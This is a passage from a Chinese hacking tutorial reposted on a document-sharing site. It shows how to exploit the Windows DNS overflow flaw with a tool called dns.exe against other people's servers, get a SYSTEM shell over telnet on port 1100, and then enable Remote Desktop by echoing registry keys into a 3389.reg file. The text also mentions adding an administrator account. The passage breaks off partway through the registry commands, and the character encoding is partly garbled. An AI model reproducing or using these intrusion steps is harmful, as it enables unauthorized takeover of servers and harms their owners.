資源描述:
《cmd下開啟遠(yuǎn)程桌面服務(wù)》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在應(yīng)用文檔-天天文庫。
1、CMD下開啟遠(yuǎn)程桌面服務(wù)文章整理發(fā)布:黑客風(fēng)云內(nèi)容關(guān)注度:24更新時間:2009-11-41:44:32 一、緣起 近段時間微軟出現(xiàn)的DNS溢出漏洞瘋狂了一段時間,就是現(xiàn)在也還有許多服務(wù)器可以成功溢出。相信大家都有體驗過溢出的經(jīng)驗了吧,嘿嘿。但是當(dāng)我們溢出成功后,返回得到的就只有一個system權(quán)限的cmdshell。要是服務(wù)器開啟了遠(yuǎn)程桌面服務(wù),那我們直接加一個用戶,再添加進(jìn)管理員組,就可以登錄服務(wù)器了。這樣的話,拿下存在DNS溢出的服務(wù)器只是分秒間的事情。從溢出到得到服務(wù)器控制權(quán)花不了多少時間。不過,要是服務(wù)器本身沒有開啟遠(yuǎn)程桌面服務(wù),就相對來說比較麻煩一點了。話
2、雖如此,服務(wù)器本身沒開,那我們就幫它開嘛,嘿嘿?! 《?、理論 在只有一個cmdshell的情況下,可能有不少菜菜不知道如何開啟遠(yuǎn)程桌面服務(wù)。不過如果對遠(yuǎn)程桌面服務(wù)比較了解的話,應(yīng)該知道開啟它其實主要就是修改了注冊表的某些鍵值來實現(xiàn)的。如何在cmdshell下修改注冊表相關(guān)鍵值呢?根據(jù)系統(tǒng)的不同,方法也有些出入。Windows2000的服務(wù)器開戶遠(yuǎn)程桌面服務(wù)一般都需要重啟一次才能生效,Windows2003的服務(wù)器開啟遠(yuǎn)程桌面服務(wù)就一般都不需要重啟,直接更改注冊表相關(guān)鍵值即可生效!據(jù)網(wǎng)上的資料來看,基本上都是先echo一個*.reg注冊表文件,再使用regedit/s*.
3、reg命令導(dǎo)入注冊表文件即可,當(dāng)然2000的話還需要重啟才生效?! ∪?、實踐 理論總是理論,不實踐過永遠(yuǎn)都只能是理論。所以我們找了些可以DNS溢出的服務(wù)器來做試驗,其中有2000系統(tǒng)的也有2003系統(tǒng)的,分別詳細(xì)說明——如何在cmdshell下開啟服務(wù)器的遠(yuǎn)程桌面服務(wù)?! ?、2000系統(tǒng) 簡要說一下如何進(jìn)行DNS溢出攻擊。我用的溢出利用程序是dns.exe,在CMD下運行它可以看到它的使用參數(shù)等信息。執(zhí)行"dns-sIP"命令檢測目標(biāo)IP是否存在DNS溢出漏洞。在圖中我們可以看出目標(biāo)主機(jī)存在DNS溢出漏洞,操作系統(tǒng)為Windows2000!接著我們進(jìn)行溢出攻擊,執(zhí)行
4、"dns-t2000allIP1207"后提示要我們檢測返回的1100端口的shell。"telnetIP1100"成功得到返回的cmdshell。注意目錄為c:WINNTsystem32,頂部也明顯可以看到Windows2000相關(guān)字樣。接著我們需要做的是使用"echo"命令寫入一個3389.reg注冊表文件。將如下代碼一行一行地復(fù)制到cmdshell窗口后按回車執(zhí)行:echoWindowsRegistryEditorVersion5.00>3389.reg echo.>>3389.reg echo[HKEY_LOCAL_MACHINESOFTWAREMic
5、rosoftWindowsCurrentVersionetcache]>>3389.reg echo"Enabled"="0">>3389.reg echo[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon]>>3389.reg echo"ShutdownWithoutLogon"="0">>3389.reg echo[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]>>3389.r
6、eg echo"EnableAdminTSRemote"=dword:00000001>>3389.reg echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServer]>>3389.reg echo"TSEnabled"=dword:00000001>>3389.reg echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]>>3389.reg echo"Start"=dword:00000002>>33
7、89.reg echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermService]>>3389.reg echo"Start"=dword:00000002>>3389.reg echo[HKEY_USERS.DEFAULTKeyboardLayoutToggle]>>3389.reg echo"Hotkey"="1">>3389.reg echo[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetCo